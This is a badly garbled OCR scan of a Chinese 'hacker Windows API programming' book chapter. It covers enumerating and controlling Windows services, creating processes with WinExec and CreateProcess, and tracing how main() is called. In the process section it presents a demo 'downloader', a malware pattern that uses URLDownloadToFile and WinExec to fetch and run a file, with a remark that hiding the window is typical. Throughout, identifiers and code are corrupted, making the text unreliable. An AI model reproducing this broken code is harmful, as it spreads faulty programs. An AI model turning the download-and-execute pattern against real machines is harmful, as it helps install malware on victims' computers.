打开 子 列表 ， 选 择 “服务 ” 则 在 右 侧 出 现 服务 项 列表 。 较 为 简单 的 方法 是 直接 在 “运行 ”窗口 
中 输入 “services.msc”， 打 开 服 务 管理 器 。 服 务 管理 器 主要 用 于 显示 系统 中 已 经 存在 的 应 用 程序 
服务 ， 显 示 对 服务 的 描述 ， 还 可 以 控制 服务 的 启动 状态 和 启动 方式 。 服 务 管理 器 如 图 3-7 所 示 。 
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3-7 ”Windows 下 的 服务 管理 程序 


在 图 3-7 显示 的 服务 列表 中 ， 只 能 查看 Win32 应 用 程序 的 服务 ， 无 法 查看 关于 驱动 程序 
的 服务 。 可 以 借助 于 其 他 一 些 工 具 来 查看 驱动 程序 级 别 的 服务 ， 图 3-8 使 用 SREng 来 查看 驱 
动 程序 相关 的 服务 列表 。 

笔者 接 下 来 会 编写 一 个 类 似 的 程序 ， 既 可 以 查看 应 用 程序 服务 列表 ， 也 可 以 查看 驱动 程 
序 服务 列表 。 编 写 完成 后 的 程序 界面 如 图 3-9 所 示 。 
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图 3-8 ”使 用 SREng 查看 驱动 程序 服务 列表 图 3-9 服务 管理 程序 界面 
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3.3 ”服务 相关 的 编程 





笔者 自己 编写 的 服务 管理 程序 既 可 以 查看 “Win32 服务 应 用 程序 ” 也 可 以 查看 “驱动 服 
务 程 序 ” 并 且 可 以 对 它们 的 运行 状态 进行 简单 的 控制 。 这 里 开发 的 服务 控制 管理 器 依然 是 使 
用 MFC 的 对 话 框 ， 其 中 还 是 用 到 了 CListCtrl 控件 〈 可 见 这 个 控件 还 是 比较 常用 的 )。 现 在 就 
开始 打造 一 个 属于 自己 的 服务 控制 管理 器 。 


3.3.2 ”服务 控制 管理 器 的 实现 


服务 控制 管理 器 的 开发 过 程 与 注册 表 局 动 管理 器 的 开发 过 程 比较 类 似 ， 主 要 也 是 枚 举 服 
务 并 显示 到 列表 控件 中 。 至 于 对 服务 状态 的 控制 ， 是 通过 服务 相关 的 API 函数 来 完成 的 。 这 
次 首先 来 编写 代码 ， 和 希望 读者 能 够 掌握 服务 相关 的 API 函数 。 在 代码 的 后 面 ， 会 对 开发 服务 
管理 器 涉及 的 API 进行 相应 的 解释 。 


注 : 学 习 API 函数 的 使 用 ，MSDN 是 最 好 的 老师 ， 详 细 、 透 彻 、 权 威 。 在 编程 的 道路 上 ， 要 不 断 通 
过 阅读 别人 的 代码 来 提高 自己 的 编程 能 力 ， 就 需要 自己 来 掌握 陌生 的 AP| 函数 ， 那 时 一 定 要 想起 查 
阅 MSDN。 


1. 服务 的 类 型 

服务 控制 管理 器 的 界面 都 已 经 熟悉 了 ， 界 面 的 布局 可 以 按照 自己 的 方式 进行 调整 。 在 枚 
举 服务 的 时 候 ， 将 “Win32 应 用 程序 服务 ”和 “驱动 程序 服务 ”分 开 枚 举 ， 这 样 有 助 于 对 各 
种 服务 的 了 解 。 

枚 举 这 两 类 服务 的 主要 差别 在 于 调用 EnumServicesStatus() 函 数 时 为 其 传递 的 第 二 个 参 
数 。 如 果 枚 举 “Win32 应 用 程序 服务 ” 那么 传递 的 参数 为 SERVICE_ WIN32; 如 果 枚 举 “ 驱 
动 程序 服务 ”， 那 么 传递 的 参数 为 SERVICE DRIVER。 这 两 个 参数 其 实 是 系统 定义 的 宏 
宏 定 义 在 WinNth 头 文件 中 ， 有 具体 定义 如 下 ; 

#define SERVICE DRIVER (SERVICE KERNEL DRIVER | \ 


SERVICE FILE SYSTEM DRIVER | \ 
SERVICE RECOGNIZER DRIVER) 


#define SERVICE WIN32 (SERVICE WIN32 OWN_PROCESS | \ 
SERVICE WIN32 SHARE PROCESS) 


SERVICE_DRIVER 和 SERVICE_WIN32 是 其 他 宏 的 组 合 ， 而 那些 宏 又 有 具体 的 值 。 下 
面 解释 一 下 其 他 宏 的 含义 。 


SERVICE_DRIVER 宏 由 3 个 宏 组 成 ， 具 体 如 下 : 

#define SERVICE KERNEL DRIVER Ox00000001 /77 设备 

#define SERVICE FILE SYSTEM DRIVER 0x00000002 // 放贷 芳 交 件 系统 弛 动 各 序 
#define SERVICE RECOGNIZER DRIVER 0x00000008 // 文件 系统 识别 器 驱动 程序 


SERVICE WIN32 宏 由 两 个 宏 组 成 ， 具 体 如 下 : 
#define SERVICE WIN32 OWN_PROCESS ”0x00000010  // 独占 二 个 进程 的 服务 
#define SERVICE WIN32_SHARE_PROCESS 0x00000020 // 与 其 他 服务 共享 一 个 进程 的 服务 


除了 以 上 两 个 宏 以 外 ， 还 有 其 他 的 服务 可 以 进行 枚 举 ， 这 里 就 不 介绍 了 《〈 其 实 有 些 类 型 
的 服务 ， 笔 者 也 不 知道 )。 如 果 想 要 枚 举 全 部 类 型 的 服务 ， 那 么 使 用 SERVICE TYPE _ALL 
宏 即 可 ， 该 宏 的 定义 如 下 : 

#define SERVICE TYPE ALL (SERVICE WIN32 | \ 

SERVICE ADAPTER | AN 


SERVICE DRIVER | \ 
SERVICE INTERACTIVE PROCESS) 
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2， 服务 的 枚 举 函 数 

服务 的 枚 举 所 使 用 的 API 函数 是 EnumServicesStatus(), 该 函数 中 需要 指定 枚 举 的 类 型 分 
别 是 SERVICE_DRIVER 和 SERVICE_ WIN32。 

有 具体 来 看 服务 枚 举 的 函数 , 代码 如 F: 


90 


第 
3 
章 
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之 行 双修 


break; 
} 第 
default: 3 
: 章 
MSerTiceliat, SetTtemrext (iy, 2 "他 1); 
} 
} 黑 
} 客 
: 三 
// 释放 申请 的 空间 瑟 
delete lpInfo> 全 
} 三 
Ba 
// 关闭 服务 管理 器 句柄 臣 
CloseServiceHandle (PSCM) ， i 
} 编 
该 函数 有 一 个 参数 , 用 来 指明 枚 举 类 型 是 “Win32 应 用 程序 服务 ”, 还 是 “驱动 程序 服务 ”。 程 
该 函数 的 默认 参数 为 “Win32 应 用 程序 服务 ”， 该 函数 的 定义 如 下 : 
VOID ShowServiceList (DWHORD dwServiceType = SERVICE WIN32); 


3. 枚 举 服务 相关 API 函数 解释 
(1) 打开 和 关闭 服务 管理 器 。 
打开 服务 管理 器 的 函数 定义 如 下 : 


SC HANDLE OpensCManager ( 


LPCTSTR lpMachineName, // computer name 
LPCTSTR JpDatabaseName, // SCM database name 
DWORD dwDesiredAccess // access type 

) 7 

参数 说 明 如 下 。 


lpMachineName: 指向 欲 打开 服务 控制 管理 器 数据 库 的 目标 主机 名 ， 本 机 则 设置 为 NULL。 
lpDatabaseName: 指向 目标 主机 SCM 数据 库 名 字 的 字符 串 。 

dwDesiredAccess: 指定 对 SCM 数据 库 的 访问 权限 。 

该 函数 调用 成 功 ， 返 回 一 个 SCM 句柄 ， 否 则 返回 NULL。 


py 注 : SCM 是 服务 控制 管理 器 的 意思 ， 它 是 系统 服务 的 一 个 组 成 部 分 ， 跟 开发 的 软件 不 是 一 个 概念 。 由 于 这 
里 不 是 编写 一 个 具体 的 服务 ， 而 只 是 对 系统 现 有 的 服务 进行 枚 举 ， 因 此 ， 一 些 概念 性 的 知识 希望 读者 可 以 
自行 查阅 相关 的 资料 。 
关闭 服务 句柄 的 函数 定义 如 下 : 
BOOL CloseServiceHandle'l 


SC_HANDLE hsSCObject // handle to service or SCM opbject 
)? 


该 函数 用 来 关闭 由 OpenSCManager() 和 OpenService(0 打 开 的 句柄 。 
(2) 服务 的 枚 举 函数 。 


枚 举 服务 的 函数 定义 如 下 : 

BOOL EnumServicesSstatus'l 
SC_HANDLE hsSCManager, // handle to SCM database 
DWORD dwServiceType, // service type 
DWORD dwServiceState, // service state 
LPENUM SERVICE STATUS JpServices, // status buffer 
DWORD cbhBufSsize, A/ srze orlstatus bufter 
LPDWORD pcbBytesNeeded, // buffer size needed 
LPDWORD lpServicesReturned, // number of entries returned 
LPDWORD lpResumeHandle /7 next entry 
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参数 说 明 如 下 。 

hSCManager: OpenSCManager(0) 函 数 返 回 的 句柄 。 

dwServiceType: 指定 枚 举 的 服务 类 型 ， 也 就 是 自 定 义 函 数 的 参数 。 
dwServiceState: 枚 举 指定 状态 的 服务 。 

lpServices: 指向 ENUM_ SERVICE STATUS 类 型 的 指针 。 
cbBufSize: 指定 缓冲 区 的 大 小 。 

pcbBytesNeeded: 返回 实际 使 用 的 内 存 空间 大 小 。 
lpServicesReturned: 返回 枚 举 服务 的 个 数 。 

lpResumeHandle: 返回 枚 举 是 否 成 功 。 


ENUM SERVICE STATUS 结构 体 的 定义 如 下 : 
typedef struct ENUM SERVICE STATUS 所 
LPTSTR lpServiceName; 
LPTSTR lpDisplayName; 
SERVICE STATUS Servicestatus; 
小 和 NUM SERVICRE STATUS, “LPENUNM SERVICE STATUS 
SERVICE_STATUS 结构 体 的 定义 如 下 : 
typedesr StrnmGt snRvIioeElSTarys et 
DWORD dwSserviceType; 
DWORD dwCurrentState; 
DWORD dwiontrolsAcecepted; 
DWORD dwWin32ExitCode,; 
DWORD dwServiceSpecificExitCode; 
DWORD dwCheckPoint; 
DWORD dwWaitHint; 
"SERVLICE STATUS EPSERYVICR STATUSS 


代码 中 两 次 调用 EnumServicesStatus() 函 数 。 第 1 次 没有 传递 第 4 个 和 第 5 个 参数 ， 使 得 
函数 返回 FALSE， 用 GetLastError() 得 到 错误 的 原因 为 ERROR_MORE DATA。 这 时 , 第 6 个 
参数 pcbBytesNeeded 返回 实际 需要 使 用 的 内 存 大 小 , 这 样 可 以 通过 new 动态 申请 所 需 的 堆 空 
间 。 以 这 种 方式 来 获取 实际 所 需 缓冲 区 大 小 的 情况 是 比较 多 的 ， 请 读者 一 定 要 理解 。 

4. 服务 的 启动 与 停止 

对 服务 的 操作 只 介绍 两 种 ， 一 种 是 启动 服务 ， 另 一 种 是 停止 服务 ， 也 就 是 改变 服务 的 状 
态 。 对 于 笔者 来 说 ， 经 常会 用 到 停止 服务 的 操作 ， 因 为 系统 中 有 很 多 笔者 用 不 到 的 服务 ， 但 
是 它 仍 然 会 随 着 系统 的 启动 而 启动 ， 这 样 既 会 影响 到 系统 的 启动 速度 ， 也 会 占用 宝贵 的 系统 
资源 。 因 此 ， 没 有 用 的 系统 服务 最 好 将 其 停止 《其实 真正 停止 服务 是 改变 它 的 启动 状态 ， 而 
不 是 这 里 介绍 的 运行 状态 )。 

启动 服务 的 代码 如 下 : 


void CManageServicesDlg::OnBtnSstart() 
4 




















人 TODO03 Add your centreol notification handler code Here 
// 选中 服务 的 索引 ， 
POSITION Bes = m Servicelist.GetFirstSelectedIitemPosition(); 
Wnt nselect es | ly 


while ( Poes ) 
nSelect = m ServiceList,.GetNextSelectedIitem (Pos); 


} 


if ( -1 == nSeleet ) 
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AfxMessageBox(" 请 选择 要 启动 的 服务 ") ; 
Te HE 
} 


// 获取 选中 服务 的 服务 名 
char szServiceName [MAXBYTE] = { 0 }; 
m ServiceList.GetIitemText (nSelect, 0, szServiceName, MAXBYTE); 


SC HANDLE hsSCM = OpenSsCManager (NULL, NULL, SC MANAGER ALL ACCESS); 
if ( NULE == HSCM ) 
{ 

AfxMessageBox ("OpensCcManager Error".); 

return ， 


} 


7/ 打开 指定 的 服务 
SC _ HANDLE RSCSerVice = OpensService (hsSCM, szServiceName, SERVICE ALL ACCESS) ， 


// 启动 服务 
BOOL bRet = StartService'(hSCService, I0, NULL); 
if ( BRet == TRUE ) 
{ 
mm Serviceanist. Setitemlext (nselect” 2 "和 和) > 
} 
else 
{ 
AfxMessageBox(" 启 动 失败 1") ; 
} 


CloseSserviceHandle (hsCService); 
CloseServiceHandle (hseM); 
} 


停止 服务 的 代码 如 下 : 
void CManageServicesDlg: :OnBtnStop () 
// TODO: Add your control notification handler code here 
// 选中 服务 的 索引 
// 此 部 分 操作 与 启动 服务 相同 ， 为 节省 篇 幅 ， 此 人 处 省 略 
PA ne . 


SC_HANDEE PhSCM = OPenSCManager (NULL, NULL, SC /MANAGER ALL ACCESS),; 
if ( NULL == SCM ) 
{ 

AfxMessageBox ("OpenSsCManager Error"); 

ratwrns 


} 


// 打开 指定 的 服务 
SC HANDLE HSCService = OQpenService (hseM, szServiceName, SERVICER ALL ACCESS); 
SERVICE_STATUS ServiceStatus; 


/7 停止 服务 
BOOT BRet = ControlService(hSsSCService, SERVICE CONTROL _STOP, &ServiceSstatus)’; 
if£ ( bRet == TRUE ) 


{ 
mservlioel ist. Setrtemtenrt (naaLecot, 2 hn) 
} 
else 
{ 
AfxMessageBox ("停止 失败 1") ; 
} 


CloseServiceHandle (hsSC3ervice); 
CloseServiceHandle(hSsCM); 


肯 需 吕 溃 


‘| 
了 | 
bb 
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5 启动 与 停止 服务 相关 API 函数 解释 
打开 指定 服务 的 函数 定义 如 下 : 


SC_HANDLE OpenServicel 
SC HANDLE hSCManager, // handle to SCM database 
LPCTSTR lpServiceName, // service name 
EA dwDesiredAccess // access 


参数 说 明 如 下 。 

hSCManager: 指定 由 OpenSCManagerO 函 数 打开 的 服务 句柄 。 

lpServiceName: 指定 要 打开 的 服务 的 名 称 。 

dwDesiredAccess: 对 要 打开 服务 的 访问 权限 ， 这 里 为 了 方便 ， 指 定 为 SC_MANAGER_ 
ALL ACCESS。 


启动 服务 的 函数 定义 如 下 : 

BOOL StartServicel( 
SC HANDLE hsService, // handle to service 
DWORD dwNumServiceArgs, // number of arguments 
LPCTSTR *lpServiceArgVectors // array of arguments 

); 

参数 说 明 如 下 。 


hService: 指定 要 启动 服务 的 句柄 ， 该 句柄 由 OpenService() 返 回 。 
dwNumServiceArgs: 指向 启动 服务 所 需 的 参数 个 数 。 
lpServiceArgVectors: 指向 启动 服务 的 参数 。 


停止 服务 的 函数 定义 如 下 : 

BOOL ControlServicel 
SC HANDLE hService, // handle to service 
DWORD dwControl, // control code 
es STATUS lpServiceStatus // status information 

参数 说 明 如 下 。 


hService: 指定 一 个 由 OpenServiceO 打 开 的 服务 句柄 。 

dwControl: 指定 要 发 送 的 控制 码 

lpServiceStatus: 返回 服务 的 状态 。 

ControlServiceO 可 以 对 服务 进行 多 种 控制 操作 ， 每 种 控制 操作 对 应 一 种 控制 码 。 当 要 停 
止 服务 时 ， 使 用 的 控制 码 为 SERVICE _ CONTROL STOP。 在 这 里 读者 一 定 要 注意 , 停止 服务 
不 要 想当然 的 使 用 StopService() 这 样 的 函数 ， 因 为 没有 这 个 API 函数 。 


注 : 更 多 与 服务 相关 的 操作 ， 可 参考 金山 卫士 开源 代码 ， 具 体 目录 为 oss/ksmi/src/src_bksafe/beikeutils 
下 的 winservice.cpp 和 winservice.h 两 个 文件 。 


3.4 进程 与 线程 


在 Windows 系统 中 ， 每 时 每 刻 都 有 不 同 的 线程 在 运行 着 。 当 Windows 的 桌面 启动 时 ， 
“Explorerexe” 就 出 现在 进程 列表 中 。 为 了 更 充分 地 利用 CPU 资源 ， 作 为 资源 容器 的 进程 中 
会 创建 多 个 线程 在 “同时 ”执行 着 。 本 节 介 绍 进程 与 线程 相关 的 编程 知识 








3.4 ”进程 与 线程 





分 注 ; 本章 不 会 就 进程 和 线程 的 概念 展开 讨论 ， 因 为 概念 和 原理 等 内 容 过 于 严谨， 以 免 误 导读 者 。 


当 运 行 一 个 程序 的 时 候 , 操作 系统 就 会 将 这 个 程序 从 磁盘 文件 装 入 内 存 , 分 配 各 种 运行 程序 
所 需 的 资源 ， 创 建 主线 程 等 一 系列 的 工作 。 进 程 是 运 
行当 中 的 程序 ， 进程 是 向 操作 系统 申请 资源 的 基本 单 
位 。 运 行 一 个 记事 本 程序 时 ， 操 作 系 统 就 会 创建 一 个 
记事 本 的 进程 。 当 关闭 记事 本 时 ， 记 事 本 进程 也 随即 
结束 。 对 进程 感性 上 的 认识 ， 这 么 多 也 就 够 了 。 

如 果 要 观察 系统 中 正在 运行 的 进程 ， 那 么 同时 
按 下 键盘 上 的 Ctrl+Shift+Esc 组 合 键 就 可 以 打开 
“任务 管理 器 ” 也 就 看 到 了 系统 中 正常 的 进程 列 
表 ， 如 图 3-10 所 示 。 对 于 任务 管理 器 中 的 众多 列 ， 
主要 关心 的 是 “映像 名 称 ”“PID” 和 “线程 数 ”3 
项 ， 这 3 项 在 编程 中 都 会 用 到 和 涉及 。 对 于 进程 和 
线程 相关 的 编程 ， 主 要 学 习 进 程 (线程 ) 的 创建 、 
结束 、 枚 举 等 相关 内 容 。 图 3-10 任务 管理 器 


3.4.1 进程 的 创建 


任何 一 个 计算 机 文件 都 是 一 个 二 进 制 文件 。 对 于 可 执行 程序 来 说 ， 它 的 二 进 制 数据 是 可 
以 被 CPU 执行 的 。 程序 是 一 个 静态 的 概念 ， 本 身 只 是 存在 于 硬盘 上 的 一 个 二 进 制 文件 。 当 用 
鼠标 双击 某 个 可 执行 程序 以 后 ， 这 个 程序 被 加 载 入 内 存 ， 这 时 就 产生 了 一 个 进程 。 操 作 系 统 
通过 装载 器 将 程序 装 入 内 存 时 ， 会 为 其 分 配 各 种 进程 所 需 的 各 种 资源 ， 并 产生 一 个 主线 程 ， 
主线 程 会 拥有 CPU 执行 时 间 ， 占 用 进程 申请 的 内 存 ……' 在 编程 的 时 候 也 经 常 需要 通过 运行 中 
的 程序 再 去 创建 一 个 新 的 进程 ， 本 节 就 来 介绍 常见 的 用 于 创建 进程 的 API 函数 。 

1. 简单 下 载 者 的 演示 

在 Windows 下 创建 进程 的 方法 有 多 种 ,这 里 通过 一 个 例子 先 介 绍 最 简单 的 一 种 方法 。 该 
方法 用 到 的 API 函数 为 WinExec()， 其 定义 如 下 : 

UINT WinExec! 

LPCSTR ‘lpCmdLine, // command line 

0 uCmdShow // window style 

参数 说 明 如 下 。 

ljpCmdLine: 指向 一 个 要 执行 的 可 执行 文件 的 字符 串 。 

uCmdShow: 程序 运行 后 的 窗口 状态 。 

第 1 个 参数 比较 好 理解 ， 比 如 要 执行 “记事 本 ”程序 ， 那 么 这 个 参数 就 可 以 是 “C:\Windows\ 
System32\Notepad.exe”。 第 2 个 参数 是 指明 程序 运行 后 窗口 的 状态 ， 常 用 的 参数 有 两 个 ， 一 
个 是 SW_SHOW， 另 一 个 是 SW_HIDE。SW_SHOW 表示 程序 运行 后 窗口 状态 为 显示 状态 ， 
SW_HIDE 表示 程序 运行 后 窗口 状态 为 隐藏 状态 。 读 者 可 以 试 着 创建 一 个 隐藏 显示 状态 的 “ 记 
事 本 ”程序 ， 方 法 如 下 : 
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WinExedal("c:\\windows\\system32\\notepad.exe", SW HIDE) : 
这 样 创建 的 “记事 本 ”进程 在 “任务 管理 器 ”中 可 以 看 到 “notepad.exe” 这 个 进程 ， 但 
是 无 法 看 到 其 窗口 界面 。 

WinExec() 函 数 在 很 多 “下 载 者 ”中 使 用 ,“ 下 载 者 ”的 英文 名 字 为 “Downloader”， 也 就 
是 下 载 器 的 意思 。 它 是 一 种 恶意 程序 ， 其 功能 较为 单一 (相对 木马 、 后 门 来 说 ,功能 单一 )。 
下 载 者 程序 的 功能 是 让 受害 者 计算 机 到 黑客 指定 的 URL 地 址 去 下 载 更 多 的 病毒 文件 或 木 
马 文件 并 运行 。 下 载 者 的 体积 较 小 ， 容 易 传播 。 当 下载 者 下 载 到 病毒 或 木马 后 ,通常 都 会 
使 用 WinExec0 来 运行 下 载 到 本 地 的 恶意 程序 ， 调 用 它 的 原因 是 只 有 两 个 参数 且 参 数 非 党 
简单 。 

下 面 简 单 来 做 一 个 下 载 者 进行 演示 ， 这 仅仅 只 是 一 个 演示 。 如 果 心 怀 碌 意 的 话 ， 不 要 企 
图 拿 它 来 做 任何 坏事 ， 因 为 演示 代码 会 很 轻易 地 被 杀毒 软件 干掉 《让 某 读 者 失望 了 )。 记 住 ， 
目的 是 学 习 编 程 知识 。 
| 要 完成 一 个 模拟 的 下 载 者 ， 就 要 让 程序 可 以 从 网 络 上 某 个 地 址 下 载 程序 。 文 件 下 载 的 方 
式 比 较 多 ， 相 对 简单 而 又 比较 常用 的 函数 是 URLDownloadToFile0。 这 个 函数 也 是 被 下 载 者 
进程 使 用 的 函数 ， 其 定义 如 下 : 
HRESULT URLDownloadToFilel 

LPUNKNOWN pCaller, 

HPOUSVRIS%URL, 

LPCTSTR szFileName, 


DWORD dwReserved, 
LPBINDSTATUSCALLBACK lpfnCB 
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); 

在 这 个 函数 中 ， 只 会 用 到 两 个 参数 ， 分 别 是 szURL 和 szFileName。 这 两 个 参数 的 说 明 如 下 。 

szURL: 指向 下 载 地 址 的 URL 的 字符 串 。 

szFileName: 指向 要 保存 到 本 地 位 置 的 字符 串 。 

其 余 的 参数 赋值 为 0 或 NULL 即 可 。 如 果 需 要 具体 了 解 该 函数 ， 请 参考 MSDN。 

使 用 URLDownloadToFile() 函 数 ， 需 要 包含 Urlmon.h 头 文件 和 Urlmon.lib 导入 库 文件 ， 
否则 在 编译 和 连接 时 会 无 法 通过 。 

己 经 了 解 了 需要 用 到 的 API 函数 ， 那 么 完成 代码 也 就 非常 简单 了 。 上 有 具体 代 码 不 过 几 行 而 
已 ， 有 具体 如 下 : 


#include <windows.h> 
#include <urlmon.h> 
#pragma comment (lJib, "urlmon") 














int main() 


char szUrl [MAX PATH] = "c:\\windows\\system32\\notepad.exe"; 
char szVirus[MAX PATH] = "d:\\virus,exe"; 


URLDownloadToFile (NULL, szUrl,, szVirus, Or NULL):; 
// 为 了 模拟 方便 看 到 效果 ， 这 里 使 用 参数 SW_SHOW 

// 一 般 可 以 传递 SW_HIDE 参数 

Winpxec(szVirus, ‘SW SHOW); 


return Or? 


} 
这 里 的 模拟 是 把 C 盘 系 统 目录 下 的 记事 本 程序 下 载 到 DD 盘 并 保存 成 名 为 virus.exe, 然后 
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运行 它 。 如 果 是 从 网 络 上 某 个 地 址 处 进行 下 载 ， 那 么 只 要 修改 szUrl 变量 保存 的 字符 串 即 可 。 
我 们 的 代码 是 一 个 简单 的 模拟 代码 ， 如 果真 正 完 成 一 个 “下 载 者 ”的 话 ， 要 比 这 个 代码 复杂 
很 多 ， 如果 要 在 源 代码 上 进行 “ 免 杀 ”， 那 么 要 考虑 到 问题 也 会 很 多 。 我 们 还 是 以 学 习 编 程 知 
识 为 目的 ， 不 要 进行 破坏 ， 否 则 随时 可 能 会 被 “ 查 水 表 ”。 

2. CreateProcess() 函 数 介绍 与 程序 的 启动 

通常 情况 下 ， 创 建 一 个 进程 会 选择 使 用 CreateProcess() 函 数 ， 该 函数 的 参数 非常 多 ， 功 
能 强大 ， 使 用 也 更 为 灵活 。 对 于 WinExec() 函 数 来 说 ， 其 使 用 简单 ， 也 只 能 完成 简单 的 进程 
创建 工作 。 如 果 要 对 被 创建 的 进程 具有 一 定 的 控制 能 力 ， 那 么 必须 使 用 功能 更 为 强大 的 
CreateProcess() 函 数 。 

在 介绍 CreateProcess() 函 数 以 前 ， 先 来 介绍 一 个 内 容 。 通 常 ， 在 编写 C 语言 的 程序 时 ， 
如 果 是 控制 台 下 的 程序 ， 那么 编写 程序 的 入 口 函数 是 main() 函 数 , 也 就 是 通常 所 说 的 主 函 数 。 
如 果 编 写 一 个 Windows 下 程序 ， 那 么 入 口 函数 是 WinMain()。 即 使 是 使 用 MFC 进行 开发 ， 
其 实 也 是 有 WinMain() 函 数 的 ， 只 不 过 是 被 庞大 的 MFC 框架 封装 了 。 那 么 程序 真 的 是 从 main() 
函数 或 者 是 WinMain() 函 数 开 始 执 行 的 吗 ? 在 写 控制 台 程 序 时 ， 如 果 需 要 给 程序 提供 参数 ， 
那么 这 个 参数 是 从 哪里 来 的 ， 主 函数 为 什么 会 有 返回 值 ， 它 会 返回 哪里 去 呢 ? 

使 用 VC6 来 写 一 个 简单 的 程序 。 通 过 调试 这 个 简单 的 程序 ， 看 看 C 语言 程序 是 否 真 的 
由 main(0) 函 数 开 始 执行 。 写 一 个 简单 的 输出 “Hello World” 的 程序 来 进行 调试 。 程序 代码 
如 下 : 


#include <stdio.h> 











int main() 
printf("Hellor Worlal ll Ne\Nna 7 


return 0; 


} 

这 是 非常 简单 的 一 个 程序 ， 按 下 F7 键 进行 编 eT | 
译 和 连接 ， 然 后 按 下 F10 键 开始 进行 单 步 调试 状态 ， i es 
打开 VC6 的 CallStack 窗口 (调用 栈 窗口 )，， 观 察 其 | 

| 
| 









内 容 ， 如 图 3-11 所 示 。 | 
在 调用 栈 中 有 3 行 记录 ， 双 击 第 2 行 ,*mainCRT WS Ml 
Startup() line 206 + 25 bytes”， 查 看 代码 编辑 窗口 的 图 3-11 CallStack 窗口 内 容 
内 容 ， 此 时 的 代码 为 调用 主 函 数 main() 的 C 运行 时 启动 函数 (简称 启动 函数 )。 代 码 编辑 窗 
口内 容 如 图 3-12 所 示 。 
可 以 看 到 ， 在 代码 编辑 窗口 的 左 侧 有 一 个 绿色 的 三 角 ， 表 示 这 行 代码 调用 了 主 函 数 
main()。 并 且 通 过 该 行 代码 可 以 发 现 ，main() 函 数 的 返回 值 赋值 给 了 mainret 变量 。 将 代码 上 
移 ， 找 到 定义 mainret 变量 的 代码 处 。mainret 的 定义 如 下 : 


int mainret; 

该 变量 的 类 型 为 int 型 。 通 常 在 定义 main(0 函 数 时 ，main0) 函 数 的 返回 值 是 int 型 。 从 上 
面 的 调用 过 程 可 以 看 出 ，main(0) 函 数 只 是 程序 员 编程 时 的 入 口 函数 ， 程 序 的 启动 并 不 是 从 
main(0) 函 数 开始 。 在 执行 main() 函 数 前 ， 操 作 系 统 及 C 语言 的 启动 代码 已 经 为 程序 做 了 很 多 
部 
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GetModuleHandleA(CNULL) , 


























第 NULL , 
lpgszComnmandtine 。 
3 Startuplnfo.dFlags & STARTF_ USESHOWNEINDOY 
? StartupinfecuSshowindow 
章 : SW SHOWDEFAULT 
Welse /= WINMAIN_  */ 

时 Hifdef WPRFLAG 
客 winitenv = Wenviron; 

mainret = wmain( arge, wargu, _Wenviron)s 
到 ielse /* WPRFLAB */ 
3 _initeny = environ; 
A mainret = walin(__arges _argu, _environ)s 
© Hendif /x WPRFLAB */ 
3 HendiF /# WINMALIN */ 
bp exit(mainrat); 

} 
了 _ except ( WcptFilter(BetExceptionCcode(), BetExceptionInformation()) ) 
《 

编 六 

*# Should neuer reach here 
程 */ 

_exit( BetExceptionCode() ); 

ET 图 3-12 启动 函数 


上 面 的 内 容 只 是 一 个 简单 的 小 插曲 。 回 归 正 题 ， 开 始 介 绍 CreateProcess() 函 数 的 使 用 。 
CreateProcess() 函 数 的 定义 如 下 : 


BOOL CreateProcess'! 
LPCTSTR lpApplicationName, // name of executable module 
LPTSTR lpCommandLine, // command line string 
LPSECURITY ATTRIBUTES lpProcessAttributes, // SD 
LPSECURITY ATTRIBUTES lpThreadAttriputes, // SD 


BOOL biInheritHandles; // handle inheritance option 
DWORD dwCreationFlags, // creation flags 
LPVOID lpEnvironment, // new environment block 
EPCTSTR lpCurrentDirectory; // current directory name 
LPSTARTUPINFO lpStartupInfo, // startup information 
LPPROCESS INFORMATION lpProcessIinformation // process information 

)? 

参数 说 明 如 下 。 


lpApplicationName: 指定 可 执行 文件 的 文件 名 。 

ljpCommandLine: 指定 欲 传 给 新 进程 的 命令 行 的 参数 。 

lpProcessAttributes: 进程 安全 属性 ， 该 值 通常 为 NULL， 表 示 为 默认 安全 属性 。 

lpThreadAttributes: 线程 安全 属性 ， 该 值 通常 为 NULL， 表 示 为 默认 安全 属性 。 

bInheritHandlers: 指定 当前 进程 中 的 可 继承 句柄 是 否 被 新 进程 继承 。 

dwCreationFlags: 指定 新 进程 的 优先 级 以 及 其 他 创建 标志 。 

该 参数 一 般 情况 下 可 以 为 0。 

如 果 要 创建 一 个 被 调试 进程 的 话 ， 需 要 把 该 参数 设置 为 DEBUG PROCESS。 创 建 进程 
的 进程 称 为 父 进程 ， 被 创建 的 进程 称 为 子 进 程 。 也 就 是 说 , 父 进程 要 对 子 进程 进行 调试 的 话 ， 
需要 在 调用 CreateProcess() 函 数 时 传递 DEBUG PROCESS 参数 。 在 传递 DEBUG PROCESS 
参数 后 ， 子 进程 创建 的 “ 孙 ” 进 程 同 样 也 处 在 被 调试 状态 中 。 如 果 不 希 望 子 进程 创建 的 “ 孙 ” 
进程 也 处 在 被 调试 状态 ， 那 么 在 父 进程 创建 子 进程 时 传递 DEBUG_ONLY_THIS _PROCESS 
和 DEBUG PROCESS 。 

在 有 些 情况 下 ， 希 望 被 创建 子 进 程 的 主线 程 暂时 不 要 运行 ， 那 么 可 以 指定 CREATE 
_SUSPENDED 参数 。 事后 希望 该 子 进程 的 主线 程 运 行 的 话 , 可 以 使 用 ResumeThread() 函 数 使 
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子 进 程 的 主线 程 恢复 运行 。 
lpEnvironment: 指定 新 进程 的 环境 变量 ， 通 常 这 里 指定 为 NULL 值 。 
lpCurrentDirectory: 指定 新 进程 使 用 的 当前 目录 。 
lpStartupInfo: 指向 STARTUPINFO 结构 体 的 指针 ， 该 结构 体 指定 新 进程 的 启动 信息 。 
该 参数 是 一 个 结构 体 ， 该 结构 体 决定 进程 启动 的 状态 。 该 结构 体 的 定义 如 下 : 
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该 结构 体 在 使 用 前 ， 需 要 对 cb 成 员 变量 进行 赋值 ， 该 成 员 变量 用 于 保存 结构 体 的 大 小 。 
该 结构 体 的 使 用 ， 这 里 不 做 过 多 介绍 。 一 般 创 建 一 个 进程 ， 只 需要 初始 化 其 中 几 个 参数 即 可 ， 
如 果 要 对 新 进程 的 输入 输出 重 定向 的 话 ， 会 用 到 该 结构 体 的 更 多 成 员 变 量 等 。 

lpProcessInformation: 指向 PROCESS _ INFORMATION 结构 体 的 指针 ， 该 结构 体 用 于 返 
回 新 创建 进程 和 主线 程 的 相关 信息 。 该 结构 体 的 定义 如 下 : 


该 结构 体 用 于 返回 新 创建 进程 的 句柄 和 进程 ID， 进 程 主线 程 的 句柄 和 主线 程 ID。 
下 面 通过 一 个 实例 来 对 CreateProcess() 函 数 进行 演示 。 








”第 3 章 黑客 Windows API 编程 








} 


CloseHandle'(pi.hThread); 
CloseHandle (pi.hProcess); 

